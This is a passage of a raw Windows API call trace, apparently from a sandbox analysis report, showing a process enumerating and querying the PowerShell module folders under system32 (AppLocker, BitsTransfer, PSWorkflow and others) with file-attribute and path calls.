| out: 
lpFindFileData=0x4ebebc4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x24b1d660, ftCreationTime.dwHighDateTime=0x1d706a5, ftLastAccessTime.dwLowDateTime=0x24b1d660, ftLastAccessTime.dwHighDateTime=0x1d706a5, ftLastWriteTime.dwLowDateTime=0x24b1d660, ftLastWriteTime.dwHighDateTime=0x1d706a5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetworkSwitchManager", cAlternateFileName="NETWOR~1")) returned 1 [0089.138] FindNextFileW (in: hFindFile=0x34d440, lpFindFileData=0x4ebebc4 | out: lpFindFileData=0x4ebebc4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x24bdbd40, ftCreationTime.dwHighDateTime=0x1d706a5, ftLastAccessTime.dwLowDateTime=0x24ce66e0, ftLastAccessTime.dwHighDateTime=0x1d706a5, ftLastWriteTime.dwLowDateTime=0x24ce66e0, ftLastWriteTime.dwHighDateTime=0x1d706a5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PSDesiredStateConfiguration", cAlternateFileName="PSDESI~1")) returned 1 [0089.138] FindNextFileW (in: hFindFile=0x34d440, lpFindFileData=0x4ebebc4 | out: lpFindFileData=0x4ebebc4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe4f50ebe, ftCreationTime.dwHighDateTime=0x1ca043e, ftLastAccessTime.dwLowDateTime=0x24bdbd40, ftLastAccessTime.dwHighDateTime=0x1d706a5, ftLastWriteTime.dwLowDateTime=0x24bdbd40, ftLastWriteTime.dwHighDateTime=0x1d706a5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PSDiagnostics", cAlternateFileName="PSDIAG~1")) returned 1 [0089.138] FindNextFileW (in: hFindFile=0x34d440, lpFindFileData=0x4ebebc4 | out: lpFindFileData=0x4ebebc4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x24bb5be0, ftCreationTime.dwHighDateTime=0x1d706a5, ftLastAccessTime.dwLowDateTime=0x24bb5be0, ftLastAccessTime.dwHighDateTime=0x1d706a5, ftLastWriteTime.dwLowDateTime=0x24bb5be0, ftLastWriteTime.dwHighDateTime=0x1d706a5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PSScheduledJob", 
cAlternateFileName="PSSCHE~1")) returned 1 [0089.138] FindNextFileW (in: hFindFile=0x34d440, lpFindFileData=0x4ebebc4 | out: lpFindFileData=0x4ebebc4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x24b8fa80, ftCreationTime.dwHighDateTime=0x1d706a5, ftLastAccessTime.dwLowDateTime=0x24b8fa80, ftLastAccessTime.dwHighDateTime=0x1d706a5, ftLastWriteTime.dwLowDateTime=0x24b8fa80, ftLastWriteTime.dwHighDateTime=0x1d706a5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PSWorkflow", cAlternateFileName="PSWORK~2")) returned 1 [0089.139] FindNextFileW (in: hFindFile=0x34d440, lpFindFileData=0x4ebebc4 | out: lpFindFileData=0x4ebebc4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x24b437c0, ftCreationTime.dwHighDateTime=0x1d706a5, ftLastAccessTime.dwLowDateTime=0x24b437c0, ftLastAccessTime.dwHighDateTime=0x1d706a5, ftLastWriteTime.dwLowDateTime=0x24b437c0, ftLastWriteTime.dwHighDateTime=0x1d706a5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PSWorkflowUtility", cAlternateFileName="PSWORK~1")) returned 1 [0089.139] FindNextFileW (in: hFindFile=0x34d440, lpFindFileData=0x4ebebc4 | out: lpFindFileData=0x4ebebc4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe4f50ebe, ftCreationTime.dwHighDateTime=0x1ca043e, ftLastAccessTime.dwLowDateTime=0x919bae56, ftLastAccessTime.dwHighDateTime=0x1cbf8b7, ftLastWriteTime.dwLowDateTime=0x919bae56, ftLastWriteTime.dwHighDateTime=0x1cbf8b7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="TroubleshootingPack", cAlternateFileName="TROUBL~1")) returned 1 [0089.139] FindNextFileW (in: hFindFile=0x34d440, lpFindFileData=0x4ebebc4 | out: lpFindFileData=0x4ebebc4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, 
nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0089.139] FindClose (in: hFindFile=0x34d440 | out: hFindFile=0x34d440) returned 1 [0089.139] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebeb7c) returned 1 [0089.139] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebeddc) returned 1 [0089.139] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Modules.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\modules.psd1")) returned 0xffffffff [0089.139] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Modules.psm1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\modules.psm1")) returned 0xffffffff [0089.139] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Modules.cdxml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\modules.cdxml")) returned 0xffffffff [0089.140] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Modules.xaml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\modules.xaml")) returned 0xffffffff [0089.140] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Modules.ni.dll" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\modules.ni.dll")) returned 0xffffffff [0089.140] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Modules.dll" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\modules.dll")) returned 0xffffffff [0089.140] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\AppLocker", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3d [0089.140] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\AppLocker", 
nBufferLength=0x3d, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\AppLocker", lpFilePart=0x0) returned 0x3c [0089.140] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebeb5c) returned 1 [0089.140] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\AppLocker" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\applocker"), fInfoLevelId=0x0, lpFileInformation=0x4ebee20 | out: lpFileInformation=0x4ebee20*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xca1d0904, ftCreationTime.dwHighDateTime=0x1cbf8b8, ftLastAccessTime.dwLowDateTime=0xd9467d5c, ftLastAccessTime.dwHighDateTime=0x1cbf8b8, ftLastWriteTime.dwLowDateTime=0xca1d0904, ftLastWriteTime.dwHighDateTime=0x1cbf8b8, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0089.140] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebeb58) returned 1 [0089.140] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\BitsTransfer", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x40 [0089.140] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\BitsTransfer", nBufferLength=0x40, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\BitsTransfer", lpFilePart=0x0) returned 0x3f [0089.140] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebeb5c) returned 1 [0089.140] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\BitsTransfer" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\bitstransfer"), fInfoLevelId=0x0, lpFileInformation=0x4ebee20 | out: lpFileInformation=0x4ebee20*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xe4f50ebe, ftCreationTime.dwHighDateTime=0x1ca043e, ftLastAccessTime.dwLowDateTime=0x919bae56, ftLastAccessTime.dwHighDateTime=0x1cbf8b7, 
ftLastWriteTime.dwLowDateTime=0x919bae56, ftLastWriteTime.dwHighDateTime=0x1cbf8b7, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0089.141] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebeb58) returned 1 [0089.141] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\CimCmdlets", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3e [0089.141] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\CimCmdlets", nBufferLength=0x3e, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\CimCmdlets", lpFilePart=0x0) returned 0x3d [0089.141] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebeb5c) returned 1 [0089.141] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\CimCmdlets" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\cimcmdlets"), fInfoLevelId=0x0, lpFileInformation=0x4ebee20 | out: lpFileInformation=0x4ebee20*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x24b8fa80, ftCreationTime.dwHighDateTime=0x1d706a5, ftLastAccessTime.dwLowDateTime=0x24b8fa80, ftLastAccessTime.dwHighDateTime=0x1d706a5, ftLastWriteTime.dwLowDateTime=0x24b8fa80, ftLastWriteTime.dwHighDateTime=0x1d706a5, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0089.141] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebeb58) returned 1 [0089.141] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\ISE", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x37 [0089.141] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\ISE", nBufferLength=0x37, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\ISE", lpFilePart=0x0) returned 0x36 [0089.141] SetThreadErrorMode 
(dwNewMode=0x1, lpOldMode=0x4ebeb5c) returned 1 [0089.141] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\ISE" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\ise"), fInfoLevelId=0x0, lpFileInformation=0x4ebee20 | out: lpFileInformation=0x4ebee20*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x24b8fa80, ftCreationTime.dwHighDateTime=0x1d706a5, ftLastAccessTime.dwLowDateTime=0x24bb5be0, ftLastAccessTime.dwHighDateTime=0x1d706a5, ftLastWriteTime.dwLowDateTime=0x24bb5be0, ftLastWriteTime.dwHighDateTime=0x1d706a5, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0089.141] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebeb58) returned 1 [0089.142] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Archive", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x50 [0089.142] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Archive", nBufferLength=0x50, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Archive", lpFilePart=0x0) returned 0x4f [0089.142] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebeb5c) returned 1 [0089.142] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Archive" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.archive"), fInfoLevelId=0x0, lpFileInformation=0x4ebee20 | out: lpFileInformation=0x4ebee20*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x24b1d660, ftCreationTime.dwHighDateTime=0x1d706a5, ftLastAccessTime.dwLowDateTime=0x24b437c0, ftLastAccessTime.dwHighDateTime=0x1d706a5, ftLastWriteTime.dwLowDateTime=0x24b437c0, ftLastWriteTime.dwHighDateTime=0x1d706a5, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 
[0089.142] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebeb58) returned 1 [0089.142] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Diagnostics", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x54 [0089.142] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Diagnostics", nBufferLength=0x54, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Diagnostics", lpFilePart=0x0) returned 0x53 [0089.142] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebeb5c) returned 1 [0089.142] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Diagnostics" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.diagnostics"), fInfoLevelId=0x0, lpFileInformation=0x4ebee20 | out: lpFileInformation=0x4ebee20*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x24b8fa80, ftCreationTime.dwHighDateTime=0x1d706a5, ftLastAccessTime.dwLowDateTime=0x24b8fa80, ftLastAccessTime.dwHighDateTime=0x1d706a5, ftLastWriteTime.dwLowDateTime=0x24b8fa80, ftLastWriteTime.dwHighDateTime=0x1d706a5, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0089.142] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebeb58) returned 1 [0089.142] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Host", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x4d [0089.142] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Host", nBufferLength=0x4d, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Host", lpFilePart=0x0) returned 0x4c 
[0089.142] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebeb5c) returned 1 [0089.142] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Host" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.host"), fInfoLevelId=0x0, lpFileInformation=0x4ebee20 | out: lpFileInformation=0x4ebee20*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x24b8fa80, ftCreationTime.dwHighDateTime=0x1d706a5, ftLastAccessTime.dwLowDateTime=0x24b8fa80, ftLastAccessTime.dwHighDateTime=0x1d706a5, ftLastWriteTime.dwLowDateTime=0x24b8fa80, ftLastWriteTime.dwHighDateTime=0x1d706a5, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0089.143] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebeb58) returned 1 [0089.143] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.LocalAccounts", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x56 [0089.143] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.LocalAccounts", nBufferLength=0x56, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.LocalAccounts", lpFilePart=0x0) returned 0x55 [0089.143] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebeb5c) returned 1 [0089.143] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.LocalAccounts" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.localaccounts"), fInfoLevelId=0x0, lpFileInformation=0x4ebee20 | out: lpFileInformation=0x4ebee20*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x24b437c0, ftCreationTime.dwHighDateTime=0x1d706a5, ftLastAccessTime.dwLowDateTime=0x24b437c0, ftLastAccessTime.dwHighDateTime=0x1d706a5, 
ftLastWriteTime.dwLowDateTime=0x24b437c0, ftLastWriteTime.dwHighDateTime=0x1d706a5, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0089.143] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebeb58) returned 1 [0089.143] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Management", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x53 [0089.143] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Management", nBufferLength=0x53, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Management", lpFilePart=0x0) returned 0x52 [0089.143] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebeb5c) returned 1 [0089.143] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Management" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.management"), fInfoLevelId=0x0, lpFileInformation=0x4ebee20 | out: lpFileInformation=0x4ebee20*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x24b8fa80, ftCreationTime.dwHighDateTime=0x1d706a5, ftLastAccessTime.dwLowDateTime=0x24b8fa80, ftLastAccessTime.dwHighDateTime=0x1d706a5, ftLastWriteTime.dwLowDateTime=0x24b8fa80, ftLastWriteTime.dwHighDateTime=0x1d706a5, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0089.143] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebeb58) returned 1 [0089.144] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x53 [0089.144] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils", nBufferLength=0x53, lpBuffer=0x4265bc8, 
lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils", lpFilePart=0x0) returned 0x52 [0089.144] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebeb5c) returned 1 [0089.144] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.odatautils"), fInfoLevelId=0x0, lpFileInformation=0x4ebee20 | out: lpFileInformation=0x4ebee20*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x24b437c0, ftCreationTime.dwHighDateTime=0x1d706a5, ftLastAccessTime.dwLowDateTime=0x24b437c0, ftLastAccessTime.dwHighDateTime=0x1d706a5, ftLastWriteTime.dwLowDateTime=0x24b437c0, ftLastWriteTime.dwHighDateTime=0x1d706a5, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0089.144] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebeb58) returned 1 [0089.144] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Security", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x51 [0089.144] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Security", nBufferLength=0x51, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Security", lpFilePart=0x0) returned 0x50 [0089.144] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebeb5c) returned 1 [0089.144] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Security" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.security"), fInfoLevelId=0x0, lpFileInformation=0x4ebee20 | out: lpFileInformation=0x4ebee20*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x24ce66e0, 
ftCreationTime.dwHighDateTime=0x1d706a5, ftLastAccessTime.dwLowDateTime=0x24ce66e0, ftLastAccessTime.dwHighDateTime=0x1d706a5, ftLastWriteTime.dwLowDateTime=0x24ce66e0, ftLastWriteTime.dwHighDateTime=0x1d706a5, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0089.144] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebeb58) returned 1 [0089.144] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x50 [0089.144] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility", nBufferLength=0x50, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility", lpFilePart=0x0) returned 0x4f [0089.145] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebeb5c) returned 1 [0089.145] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility"), fInfoLevelId=0x0, lpFileInformation=0x4ebee20 | out: lpFileInformation=0x4ebee20*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x24bb5be0, ftCreationTime.dwHighDateTime=0x1d706a5, ftLastAccessTime.dwLowDateTime=0x24bb5be0, ftLastAccessTime.dwHighDateTime=0x1d706a5, ftLastWriteTime.dwLowDateTime=0x24bb5be0, ftLastWriteTime.dwHighDateTime=0x1d706a5, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0089.145] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebeb58) returned 1 [0089.145] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.WSMan.Management", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x4e [0089.145] GetFullPathNameW (in: 
lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.WSMan.Management", nBufferLength=0x4e, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.WSMan.Management", lpFilePart=0x0) returned 0x4d [0089.145] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebeb5c) returned 1 [0089.145] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.WSMan.Management" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.wsman.management"), fInfoLevelId=0x0, lpFileInformation=0x4ebee20 | out: lpFileInformation=0x4ebee20*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x24ce66e0, ftCreationTime.dwHighDateTime=0x1d706a5, ftLastAccessTime.dwLowDateTime=0x24d0c840, ftLastAccessTime.dwHighDateTime=0x1d706a5, ftLastWriteTime.dwLowDateTime=0x24d0c840, ftLastWriteTime.dwHighDateTime=0x1d706a5, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0089.145] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebeb58) returned 1 [0089.145] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetworkSwitchManager", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x48 [0089.145] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetworkSwitchManager", nBufferLength=0x48, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetworkSwitchManager", lpFilePart=0x0) returned 0x47 [0089.146] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebeb5c) returned 1 [0089.146] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetworkSwitchManager" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\networkswitchmanager"), fInfoLevelId=0x0, lpFileInformation=0x4ebee20 | out: 
lpFileInformation=0x4ebee20*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x24b1d660, ftCreationTime.dwHighDateTime=0x1d706a5, ftLastAccessTime.dwLowDateTime=0x24b1d660, ftLastAccessTime.dwHighDateTime=0x1d706a5, ftLastWriteTime.dwLowDateTime=0x24b1d660, ftLastWriteTime.dwHighDateTime=0x1d706a5, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0089.146] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebeb58) returned 1 [0089.146] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSDesiredStateConfiguration", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x4f [0089.146] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSDesiredStateConfiguration", nBufferLength=0x4f, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSDesiredStateConfiguration", lpFilePart=0x0) returned 0x4e [0089.146] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebeb5c) returned 1 [0089.146] GetFileAttributesExW (in: 